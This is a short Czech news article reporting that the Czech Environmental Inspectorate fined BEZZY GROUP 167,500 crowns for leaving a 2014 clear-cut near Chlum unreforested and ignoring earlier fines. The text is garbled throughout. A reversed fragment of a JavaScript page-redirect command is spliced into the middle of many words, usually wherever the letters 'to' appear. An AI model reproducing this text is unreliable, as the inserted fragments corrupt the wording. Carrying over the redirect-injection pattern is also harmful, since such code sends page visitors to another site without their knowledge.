Rainbow page separator

Vlastník les vytěžil a nezalesnil, sbírá pokuty, které neplatí

Neděle, 31. března 2019

Žďársko / Pokutu ve výši 167 500 tisíc korun uložili inspek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři z České inspekce životního prostředí (ČIŽP) v Havlíčkově Brodě firmě BEZZY GROUP, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za ohrožení životního prostředí v lesích. Po opakovaných výzvách i předchozích uložených pokutách společnost nezalesnila v roce 2014 vytěženou plochu o výměře 0,77 hektaru na lesních pozemcích v katastru obce Chlum. Taktéž nekomunikuje s lesním hospodářem, se státní správou ani s inspekcí, nezúčastnila se kontrol a většinu písemností nepřebírá. Postupně jí byly uloženy pokuty ve výši 64 200 a 96 tisíc korun za včasné nezpracování kůrovcem napadených stromů. Žádná ze sankcí však nebyla uhrazena. „Kontrolou 1. srpna 2018 jsme zjistili, že opět nic nebylo splněno. Klest zůstal nevyklizen, plocha byla silně zabuřenělá převážně červeným bezem, starčkem a dalšími bylinami. Vzhledem k agresivní buřeni nelze očekávat přirozené zmlazení lesních dřevin. Stav je v rozporu se zákonem o lesích, který ukládá vlastníku lesa povinnost holinu na lesních pozemcích zalesnit do dvou let a porosty na ní zajistit do sedmi let od jejího vzniku,“ vyjádřil se Jan Panský, ředitel Oblastního inspek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torátu ČIŽP v Havlíčkově Brodě.
Na povinnost opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně zalesnit holinu byli vlastníci lesa písemně upozorněni ještě před samotným kácením. „Z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho vyplývá, že obviněný v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě měl a mohl konat potřebné kroky k nápravě nežádoucího stavu, ale přes prokazatelné informace nekonal. Inspekcí uložené opatření nesplnil ani ve stanovené náhradní lhůtě. To znamená, že jeho jednání bylo motivováno pouze ziskem z vytěženého dřeva,“ dodal Panský.